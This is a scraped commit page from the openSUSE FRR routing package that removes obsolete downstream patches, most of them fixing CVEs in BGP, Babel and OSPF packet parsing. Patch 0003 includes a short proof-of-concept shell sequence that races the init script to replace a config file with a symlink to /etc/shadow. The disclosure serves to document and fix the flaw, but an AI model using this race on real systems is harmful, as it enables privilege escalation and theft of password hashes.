pool/frr
SHA256
2
0
Fork 1
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Accepting request 1192960 from network

Browse Source 
- Fixing Source URL/archive name.
- Update to version 10.0.1 from official sources.
- Clean slate: removing all previous patches.
- The following patches were obsoleted:
  - 0001-disable-zmq-test.patch
  - harden_frr.service.patch
  - 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch
  - 0004-tools-remove-backslash-from-declare-check-regex.patch
  - 0005-root-ok-in-account-frr.pam.patch
  - 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
  - 0007-bgpd-Ensure-stream-received-has-enough-data.patch
  - 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch
  - 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
  - 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch
  - 0011-babeld-fix-11808-to-avoid-infinite-loops.patch
  - 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch
  - 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch
  - 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch
  - 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch
  - 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch
  - 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch
  - 0018-bgpd-Flowspec-overflow-issue.patch
  - 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
  - 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch
  - 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
  - 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
  - 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch

OBS-URL: https://build.opensuse.org/request/show/1192960
OBS-URL: https://build.opensuse.org/package/show/openSUSE:Factory/frr?expand=0&rev=33
This commit is contained in:
Dominique Leuenberger 2024-08-10 17:07:12 +00:00 committed by Git OBS Bridge
commit ec3733e9b8
27 changed files with 72 additions and 1759 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
0001-disable-zmq-test.patch
View File

@ -1,25 +0,0 @@
From a19581f960db4c5f4f3b759e2d7ecf3e9ac73381 Mon Sep 17 00:00:00 2001
From: Ruben Torrero Marijnissen <rtorreromarijnissen@suse.com>
Date: Mon, 21 Dec 2020 18:36:43 +0000
Subject: [PATCH] tests: disable zeromq tests due to build service timeouts
References: bsc#1180217
---
tests/lib/test_zmq.py | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/tests/lib/test_zmq.py b/tests/lib/test_zmq.py
index 1f8ee5416..b298fe7b5 100644
--- a/tests/lib/test_zmq.py
+++ b/tests/lib/test_zmq.py
@@ -5,8 +5,7 @@ import os
program = "./test_zmq"
@pytest.mark.skipif(
- 'S["ZEROMQ_TRUE"]=""\n' not in open("../config.status").readlines(),
- reason="ZEROMQ not enabled",
+ reason="Test disabled due to intermittent build service timeouts"
)
def test_refout(self):
return super(TestZMQ, self).test_refout()
--
2.29.2

93
0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch
View File

@ -1,93 +0,0 @@
From 401053f3ccc7be3a6a976f6f7f1674bdeb3c983e Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Thu, 20 Oct 2022 09:10:22 +0300
References: bsc#1204124,CVE-2022-42917,https://github.com/FRRouting/frr/pull/12157
Upstream: submitted
Subject: [PATCH] tools: Run as FRR_USER `install/chown` commands to avoid race
conditions
This is due to CVE-2022-42917: https://bugzilla.suse.com/show_bug.cgi?id=1204124
install/chown is in most cases (as I tested) is enough, but still, can be racy.
Tested on Linux/OpenBSD/NetBSD/FreeBSD, seems a unified way to do this.
For Linux `runuser` can be used, but *BSD do not have this command.
Proof of concept:
```
% sudo su - frr
[sudo] password for donatas:
su: warning: cannot change directory to /nonexistent: No such file or directory
frr@donatas-laptop:/home/donatas$ cd /etc/frr/
frr@donatas-laptop:/etc/frr$ rm -f zebra.conf; inotifywait -e CREATE .; rm -f zebra.conf; ln -s /etc/shadow zebra.conf
Setting up watches.
Watches established.
./ CREATE zebra.conf
frr@donatas-laptop:/etc/frr$ ls -la zebra.conf
lrwxrwxrwx 1 frr frr 11 spal. 20 09:25 zebra.conf -> /etc/shadow
frr@donatas-laptop:/etc/frr$ cat zebra.conf
cat: zebra.conf: Permission denied
frr@donatas-laptop:/etc/frr$
```
On the other terminal do:
```
/usr/lib/frr/frrinit.sh restart
```
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
diff --git a/tools/frr.in b/tools/frr.in
index e9f1122834..5f3f425a1e 100755
--- a/tools/frr.in
+++ b/tools/frr.in
@@ -96,10 +96,10 @@ check_daemon()
# check for config file
if [ -n "$2" ]; then
if [ ! -r "$C_PATH/$1-$2.conf" ]; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1-$2.conf"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1-$2.conf\""
fi
elif [ ! -r "$C_PATH/$1.conf" ]; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1.conf"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1.conf\""
fi
fi
return 0
@@ -524,7 +524,7 @@ convert_daemon_prios
if [ ! -d $V_PATH ]; then
echo "Creating $V_PATH"
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\""
chmod gu+x "${V_PATH}"
fi
diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in
index 61f1abb378..4d5d688d57 100755
--- a/tools/frrcommon.sh.in
+++ b/tools/frrcommon.sh.in
@@ -143,7 +143,7 @@ daemon_prep() {
cfg="$C_PATH/$daemon${inst:+-$inst}.conf"
if [ ! -r "$cfg" ]; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$cfg"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$cfg\""
fi
return 0
}
@@ -161,7 +161,7 @@ daemon_start() {
[ "$MAX_FDS" != "" ] && ulimit -n "$MAX_FDS" > /dev/null 2> /dev/null
daemon_prep "$daemon" "$inst" || return 1
if test ! -d "$V_PATH"; then
- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH"
+ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\""
chmod gu+x "${V_PATH}"
fi
--
2.35.3

29
0004-tools-remove-backslash-from-declare-check-regex.patch
View File

@ -1,29 +0,0 @@
From 3474b220e036497e6bbe23428645217c275f9f87 Mon Sep 17 00:00:00 2001
From: Marius Tomaschewski <mt@suse.com>
Date: Fri, 11 Nov 2022 12:26:04 +0100
References: https://github.com/FRRouting/frr/pull/12307
Upstream: submitted
Subject: [PATCH] tools: remove backslash from declare check regex
The backslash in `grep -q '^declare \-a'` is not needed and
causes `grep: warning: stray \ before -` warning in grep-3.8.
---
tools/frrcommon.sh.in | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in
index 61f1abb378..3c16c27c6d 100755
--- a/tools/frrcommon.sh.in
+++ b/tools/frrcommon.sh.in
@@ -335,7 +335,7 @@ if [ -z "$FRR_PATHSPACE" ]; then
load_old_config "/etc/sysconfig/frr"
fi
-if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare \-a'; then
+if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare -a'; then
log_warning_msg "watchfrr_options contains a bash array value." \
"The configured value is intentionally ignored since it is likely wrong." \
"Please remove or fix the setting."
--
2.35.3

33
0005-root-ok-in-account-frr.pam.patch
View File

@ -1,33 +0,0 @@
From cb467471b31cd653e758bc3f82fffe7c44654796 Mon Sep 17 00:00:00 2001
From: Marius Tomaschewski <mt@suse.com>
Date: Fri, 11 Nov 2022 14:50:12 +0100
References: https://github.com/FRRouting/frr/pull/12308
Upstream: submitted
Subject: [PATCH] pam: declare root as sufficient frr pam account
https://github.com/FRRouting/frr/pull/11465 enabled account verification,
but the pam config declares rootok as sufficient in authentication only
and not in account verification, what causes warning in the log:
vtysh[3747]: pam_warn(frr:account): function=[pam_sm_acct_mgmt]
flags=0 service=[frr] terminal=[<unknown>] user=[root]
ruser=[<unknown>] rhost=[<unknown>]
---
redhat/frr.pam | 1 +
1 file changed, 1 insertion(+)
diff --git a/redhat/frr.pam b/redhat/frr.pam
index 5cef5d9d74..17a62f1999 100644
--- a/redhat/frr.pam
+++ b/redhat/frr.pam
@@ -5,6 +5,7 @@
# Only allow root (and possibly wheel) to use this because enable access
# is unrestricted.
auth sufficient pam_rootok.so
+account sufficient pam_rootok.so
# Uncomment the following line to implicitly trust users in the "wheel" group.
#auth sufficient pam_wheel.so trust use_uid
--
2.35.3

48
0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
View File

@ -1,48 +0,0 @@
From d95229c9ba4c8ff99dfc644dd2d1e9e172fe3faf Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Fri, 24 Mar 2023 09:55:23 +0200
Upstream: yes
References: bsc#1211248,CVE-2023-31489,https://github.com/FRRouting/frr/pull/13100/commits/b1d33ec293e8e36fbb8766252f3b016d268e31ce
Subject: [PATCH] bgpd: Check 7 bytes for Long-lived Graceful-Restart
capability
It's not 4 bytes, it was assuming the same as Graceful-Restart tuples.
LLGR has more 3 bytes (Long-lived Stale Time).
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c
index d1667fac26..907e75e76b 100644
--- a/bgpd/bgp_open.c
+++ b/bgpd/bgp_open.c
@@ -599,12 +599,24 @@ static int bgp_capability_restart(struct peer *peer,
static int bgp_capability_llgr(struct peer *peer,
struct capability_header *caphdr)
{
+/*
+ * +--------------------------------------------------+
+ * | Address Family Identifier (16 bits) |
+ * +--------------------------------------------------+
+ * | Subsequent Address Family Identifier (8 bits) |
+ * +--------------------------------------------------+
+ * | Flags for Address Family (8 bits) |
+ * +--------------------------------------------------+
+ * | Long-lived Stale Time (24 bits) |
+ * +--------------------------------------------------+
+ */
+#define BGP_CAP_LLGR_MIN_PACKET_LEN 7
struct stream *s = BGP_INPUT(peer);
size_t end = stream_get_getp(s) + caphdr->length;
SET_FLAG(peer->cap, PEER_CAP_LLGR_RCV);
- while (stream_get_getp(s) + 4 <= end) {
+ while (stream_get_getp(s) + BGP_CAP_LLGR_MIN_PACKET_LEN <= end) {
afi_t afi;
safi_t safi;
iana_afi_t pkt_afi = stream_getw(s);
--
2.35.3

155
0007-bgpd-Ensure-stream-received-has-enough-data.patch
View File

@ -1,155 +0,0 @@
From 6d307ec2f5f5f9827f340a08941e6f78d09d1876 Mon Sep 17 00:00:00 2001
From: Donald Sharp <sharpd@nvidia.com>
Date: Tue, 6 Dec 2022 10:23:11 -0500
Upstream: yes
References: bsc#1211249,CVE-2023-31490,https://github.com/FRRouting/frr/pull/12454/commits/06431bfa7570f169637ebb5898f0b0cc3b010802
Subject: [PATCH] bgpd: Ensure stream received has enough data
BGP_PREFIX_SID_SRV6_L3_SERVICE attributes must not
fully trust the length value specified in the nlri.
Always ensure that the amount of data we need to read
can be fullfilled.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donald Sharp <sharpd@nvidia.com>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index b7d0958bac..c6177a1b93 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -2748,9 +2748,21 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
uint8_t sid_type, sid_flags;
char buf[BUFSIZ];
+ /*
+ * Check that we actually have at least as much data as
+ * specified by the length field
+ */
+ if (STREAM_READABLE(peer->curr) < length) {
+ flog_err(
+ EC_BGP_ATTR_LEN,
+ "Prefix SID specifies length %hu, but only %zu bytes remain",
+ length, STREAM_READABLE(peer->curr));
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
+ args->total);
+ }
+
if (type == BGP_PREFIX_SID_LABEL_INDEX) {
- if (STREAM_READABLE(peer->curr) < length
- || length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) {
+ if (length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) {
flog_err(EC_BGP_ATTR_LEN,
"Prefix SID label index length is %hu instead of %u",
length, BGP_PREFIX_SID_LABEL_INDEX_LENGTH);
@@ -2772,12 +2784,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
/* Store label index; subsequently, we'll check on
* address-family */
attr->label_index = label_index;
- }
-
- /* Placeholder code for the IPv6 SID type */
- else if (type == BGP_PREFIX_SID_IPV6) {
- if (STREAM_READABLE(peer->curr) < length
- || length != BGP_PREFIX_SID_IPV6_LENGTH) {
+ } else if (type == BGP_PREFIX_SID_IPV6) {
+ if (length != BGP_PREFIX_SID_IPV6_LENGTH) {
flog_err(EC_BGP_ATTR_LEN,
"Prefix SID IPv6 length is %hu instead of %u",
length, BGP_PREFIX_SID_IPV6_LENGTH);
@@ -2791,10 +2799,7 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
stream_getw(peer->curr);
stream_get(&ipv6_sid, peer->curr, 16);
- }
-
- /* Placeholder code for the Originator SRGB type */
- else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) {
+ } else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) {
/*
* ietf-idr-bgp-prefix-sid-05:
* Length is the total length of the value portion of the
@@ -2819,19 +2824,6 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
args->total);
}
- /*
- * Check that we actually have at least as much data as
- * specified by the length field
- */
- if (STREAM_READABLE(peer->curr) < length) {
- flog_err(EC_BGP_ATTR_LEN,
- "Prefix SID Originator SRGB specifies length %hu, but only %zu bytes remain",
- length, STREAM_READABLE(peer->curr));
- return bgp_attr_malformed(
- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
- args->total);
- }
-
/*
* Check that the portion of the TLV containing the sequence of
* SRGBs corresponds to a multiple of the SRGB size; to get
@@ -2855,12 +2847,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
stream_get(&srgb_base, peer->curr, 3);
stream_get(&srgb_range, peer->curr, 3);
}
- }
-
- /* Placeholder code for the VPN-SID Service type */
- else if (type == BGP_PREFIX_SID_VPN_SID) {
- if (STREAM_READABLE(peer->curr) < length
- || length != BGP_PREFIX_SID_VPN_SID_LENGTH) {
+ } else if (type == BGP_PREFIX_SID_VPN_SID) {
+ if (length != BGP_PREFIX_SID_VPN_SID_LENGTH) {
flog_err(EC_BGP_ATTR_LEN,
"Prefix SID VPN SID length is %hu instead of %u",
length, BGP_PREFIX_SID_VPN_SID_LENGTH);
@@ -2896,39 +2884,22 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length,
attr->srv6_vpn->sid_flags = sid_flags;
sid_copy(&attr->srv6_vpn->sid, &ipv6_sid);
attr->srv6_vpn = srv6_vpn_intern(attr->srv6_vpn);
- }
-
- /* Placeholder code for the SRv6 L3 Service type */
- else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) {
- if (STREAM_READABLE(peer->curr) < length) {
+ } else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) {
+ if (STREAM_READABLE(peer->curr) < 1) {
flog_err(
EC_BGP_ATTR_LEN,
- "Prefix SID SRv6 L3-Service length is %hu, but only %zu bytes remain",
- length, STREAM_READABLE(peer->curr));
- return bgp_attr_malformed(args,
- BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
- args->total);
+ "Prefix SID SRV6 L3 Service not enough data left, it must be at least 1 byte");
+ return bgp_attr_malformed(
+ args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
+ args->total);
}
-
/* ignore reserved */
stream_getc(peer->curr);
return bgp_attr_srv6_service(args);
}
-
/* Placeholder code for Unsupported TLV */
else {
-
- if (STREAM_READABLE(peer->curr) < length) {
- flog_err(
- EC_BGP_ATTR_LEN,
- "Prefix SID SRv6 length is %hu - too long, only %zu remaining in this UPDATE",
- length, STREAM_READABLE(peer->curr));
- return bgp_attr_malformed(
- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR,
- args->total);
- }
-
if (bgp_debug_update(peer, NULL, NULL, 1))
zlog_debug(
"%s attr Prefix-SID sub-type=%u is not supported, skipped",
--
2.35.3

29
0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch
View File

@ -1,29 +0,0 @@
From a6c5ef48cb086b94a5b911af4ee9f675213fb14b Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Sun, 20 Aug 2023 22:15:27 +0300
Upstream: yes
References: CVE-2023-41360,bsc#1214739,https://github.com/FRRouting/frr/pull/14245
Subject: [PATCH] bgpd: Don't read the first byte of ORF header if we are ahead
of stream
Reported-by: Iggy Frankovic iggyfran@amazon.com
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 72d6a92317..4947dbc21d 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -2375,7 +2375,8 @@ static int bgp_route_refresh_receive(struct peer *peer, bgp_size_t size)
* and 7 bytes of ORF Address-filter entry from
* the stream
*/
- if (*p_pnt & ORF_COMMON_PART_REMOVE_ALL) {
+ if (p_pnt < p_end &&
+ *p_pnt & ORF_COMMON_PART_REMOVE_ALL) {
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP rcvd Remove-All pfxlist ORF request",
--
2.35.3

100
0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
View File

@ -1,100 +0,0 @@
From e51ca641b4a96e575be069aeea922e31f7b8dfa4 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Tue, 22 Aug 2023 22:52:04 +0300
Upstream: yes
References: CVE-2023-41358,bsc#1214735,https://github.com/FRRouting/frr/pull/14260
Subject: [PATCH] bgpd: Do not process NLRIs if the attribute length is
zero
```
3 0x00007f423aa42476 in __GI_raise (sig=sig@entry=11) at ../sysdeps/posix/raise.c:26
4 0x00007f423aef9740 in core_handler (signo=11, siginfo=0x7fffc414deb0, context=<optimized out>) at lib/sigevent.c:246
5 <signal handler called>
6 0x0000564dea2fc71e in route_set_aspath_prepend (rule=0x564debd66d50, prefix=0x7fffc414ea30, object=0x7fffc414e400)
at bgpd/bgp_routemap.c:2258
7 0x00007f423aeec7e0 in route_map_apply_ext (map=<optimized out>, prefix=prefix@entry=0x7fffc414ea30,
match_object=match_object@entry=0x7fffc414e400, set_object=set_object@entry=0x7fffc414e400, pref=pref@entry=0x0) at lib/routemap.c:2690
8 0x0000564dea2d277e in bgp_input_modifier (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, attr=attr@entry=0x7fffc414e770,
afi=afi@entry=AFI_IP, safi=safi@entry=SAFI_UNICAST, rmap_name=rmap_name@entry=0x0, label=0x0, num_labels=0, dest=0x564debdd5130)
at bgpd/bgp_route.c:1772
9 0x0000564dea2df762 in bgp_update (peer=peer@entry=0x7f4238f59010, p=p@entry=0x7fffc414ea30, addpath_id=addpath_id@entry=0,
attr=0x7fffc414eb50, afi=afi@entry=AFI_IP, safi=<optimized out>, safi@entry=SAFI_UNICAST, type=9, sub_type=0, prd=0x0, label=0x0,
num_labels=0, soft_reconfig=0, evpn=0x0) at bgpd/bgp_route.c:4374
10 0x0000564dea2e2047 in bgp_nlri_parse_ip (peer=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50, packet=0x7fffc414eaf0)
at bgpd/bgp_route.c:6249
11 0x0000564dea2c5a58 in bgp_nlri_parse (peer=peer@entry=0x7f4238f59010, attr=attr@entry=0x7fffc414eb50,
packet=packet@entry=0x7fffc414eaf0, mp_withdraw=mp_withdraw@entry=false) at bgpd/bgp_packet.c:339
12 0x0000564dea2c5d66 in bgp_update_receive (peer=peer@entry=0x7f4238f59010, size=size@entry=109) at bgpd/bgp_packet.c:2024
13 0x0000564dea2c901d in bgp_process_packet (thread=<optimized out>) at bgpd/bgp_packet.c:2933
14 0x00007f423af0bf71 in event_call (thread=thread@entry=0x7fffc414ee40) at lib/event.c:1995
15 0x00007f423aebb198 in frr_run (master=0x564deb73c670) at lib/libfrr.c:1213
16 0x0000564dea261b83 in main (argc=<optimized out>, argv=<optimized out>) at bgpd/bgp_main.c:505
```
With the configuration:
```
frr version 9.1-dev-MyOwnFRRVersion
frr defaults traditional
hostname ip-172-31-13-140
log file /tmp/debug.log
log syslog
service integrated-vtysh-config
!
debug bgp keepalives
debug bgp neighbor-events
debug bgp updates in
debug bgp updates out
!
router bgp 100
bgp router-id 9.9.9.9
no bgp ebgp-requires-policy
bgp bestpath aigp
neighbor 172.31.2.47 remote-as 200
!
address-family ipv4 unicast
neighbor 172.31.2.47 default-originate
neighbor 172.31.2.47 route-map RM_IN in
exit-address-family
exit
!
route-map RM_IN permit 10
set as-path prepend 200
exit
!
```
The issue is that we try to process NLRIs even if the attribute length is 0.
Later bgp_update() will handle route-maps and a crash occurs because all the
attributes are NULL, including aspath, where we dereference.
According to the RFC 4271:
A value of 0 indicates that neither the Network Layer
Reachability Information field nor the Path Attribute field is
present in this UPDATE message.
But with a fuzzed UPDATE message this can be faked. I think it's reasonable
to skip processing NLRIs if both update_len and attribute_len are 0.
Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
index 4947dbc21d..1ef421028f 100644
--- a/bgpd/bgp_packet.c
+++ b/bgpd/bgp_packet.c
@@ -1951,7 +1951,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size)
/* Network Layer Reachability Information. */
update_len = end - stream_pnt(s);
- if (update_len) {
+ if (update_len && attribute_len) {
/* Set NLRI portion to structure. */
nlris[NLRI_UPDATE].afi = AFI_IP;
nlris[NLRI_UPDATE].safi = SAFI_UNICAST;
--
2.35.3

131
0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch
View File

@ -1,131 +0,0 @@
From 129adde0aef424778d6c4791b5be10e302db9320 Mon Sep 17 00:00:00 2001
From: Donatas Abraitis <donatas@opensourcerouting.org>
Date: Thu, 13 Jul 2023 22:32:03 +0300
Upstream: yes
References: CVE-2023-38802,bsc#1213284,https://github.com/FRRouting/frr/pull/14290
Subject: [PATCH] bgpd: Use treat-as-withdraw for tunnel encapsulation
attribute
Before this path we used session reset method, which is discouraged by rfc7606.
Handle this as rfc requires.
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c
index c6177a1b93..188393b752 100644
--- a/bgpd/bgp_attr.c
+++ b/bgpd/bgp_attr.c
@@ -1301,6 +1301,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode,
case BGP_ATTR_LARGE_COMMUNITIES:
case BGP_ATTR_ORIGINATOR_ID:
case BGP_ATTR_CLUSTER_LIST:
+ case BGP_ATTR_ENCAP:
case BGP_ATTR_OTC:
return BGP_ATTR_PARSE_WITHDRAW;
case BGP_ATTR_MP_REACH_NLRI:
@@ -2426,26 +2427,21 @@ bgp_attr_ipv6_ext_communities(struct bgp_attr_parser_args *args)
}
/* Parse Tunnel Encap attribute in an UPDATE */
-static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
- bgp_size_t length, /* IN: attr's length field */
- struct attr *attr, /* IN: caller already allocated */
- uint8_t flag, /* IN: attr's flags field */
- uint8_t *startp)
+static int bgp_attr_encap(struct bgp_attr_parser_args *args)
{
- bgp_size_t total;
uint16_t tunneltype = 0;
-
- total = length + (CHECK_FLAG(flag, BGP_ATTR_FLAG_EXTLEN) ? 4 : 3);
+ struct peer *const peer = args->peer;
+ struct attr *const attr = args->attr;
+ bgp_size_t length = args->length;
+ uint8_t type = args->type;
+ uint8_t flag = args->flags;
if (!CHECK_FLAG(flag, BGP_ATTR_FLAG_TRANS)
|| !CHECK_FLAG(flag, BGP_ATTR_FLAG_OPTIONAL)) {
- zlog_info(
- "Tunnel Encap attribute flag isn't optional and transitive %d",
- flag);
- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_ATTR_FLAG_ERR,
- startp, total);
- return -1;
+ zlog_err("Tunnel Encap attribute flag isn't optional and transitive %d",
+ flag);
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
if (BGP_ATTR_ENCAP == type) {
@@ -2453,12 +2449,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
uint16_t tlv_length;
if (length < 4) {
- zlog_info(
+ zlog_err(
"Tunnel Encap attribute not long enough to contain outer T,L");
- bgp_notify_send_with_data(
- peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total);
- return -1;
+ return bgp_attr_malformed(args,
+ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
tunneltype = stream_getw(BGP_INPUT(peer));
tlv_length = stream_getw(BGP_INPUT(peer));
@@ -2488,13 +2483,11 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
}
if (sublength > length) {
- zlog_info(
- "Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d",
- sublength, length);
- bgp_notify_send_with_data(
- peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, startp, total);
- return -1;
+ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining length %d",
+ sublength, length);
+ return bgp_attr_malformed(args,
+ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
/* alloc and copy sub-tlv */
@@ -2542,13 +2535,10 @@ static int bgp_attr_encap(uint8_t type, struct peer *peer, /* IN */
if (length) {
/* spurious leftover data */
- zlog_info(
- "Tunnel Encap attribute length is bad: %d leftover octets",
- length);
- bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR,
- BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
- startp, total);
- return -1;
+ zlog_err("Tunnel Encap attribute length is bad: %d leftover octets",
+ length);
+ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_OPT_ATTR_ERR,
+ args->total);
}
return 0;
@@ -3387,8 +3377,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr,
case BGP_ATTR_VNC:
#endif
case BGP_ATTR_ENCAP:
- ret = bgp_attr_encap(type, peer, length, attr, flag,
- startp);
+ ret = bgp_attr_encap(&attr_args);
break;
case BGP_ATTR_PREFIX_SID:
ret = bgp_attr_prefix_sid(&attr_args);
--
2.35.3

48
0011-babeld-fix-11808-to-avoid-infinite-loops.patch
View File

@ -1,48 +0,0 @@
From 8a8f20d89585aa490e3cae5ad705ce23107fc1fe Mon Sep 17 00:00:00 2001
From: harryreps <harryreps@gmail.com>
Date: Fri, 3 Mar 2023 23:17:14 +0000
Upsteam: yes
References: CVE-2023-3748,bsc#1213434,gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952
Subject: [PATCH] babeld: fix #11808 to avoid infinite loops
Replacing continue in loops to goto done so that index of packet buffer
increases.
Signed-off-by: harryreps <harryreps@gmail.com>
(cherry picked from commit ae1e0e1fed77716bc06f181ad68c4433fb5523d0)
Signed-off-by: Marius Tomaschewski <mt@suse.com>
diff --git a/babeld/message.c b/babeld/message.c
index 7d45d91bf7..2bf2337965 100644
--- a/babeld/message.c
+++ b/babeld/message.c
@@ -439,7 +439,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
debugf(BABEL_DEBUG_COMMON,
"Received Hello from %s on %s that does not have all 0's in the unused section of flags, ignoring",
format_address(from), ifp->name);
- continue;
+ goto done;
}
/*
@@ -451,7 +451,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
debugf(BABEL_DEBUG_COMMON,
"Received Unicast Hello from %s on %s that FRR is not prepared to understand yet",
format_address(from), ifp->name);
- continue;
+ goto done;
}
DO_NTOHS(seqno, message + 4);
@@ -469,7 +469,7 @@ parse_packet(const unsigned char *from, struct interface *ifp,
debugf(BABEL_DEBUG_COMMON,
"Received hello from %s on %s should be ignored as that this version of FRR does not know how to properly handle interval == 0",
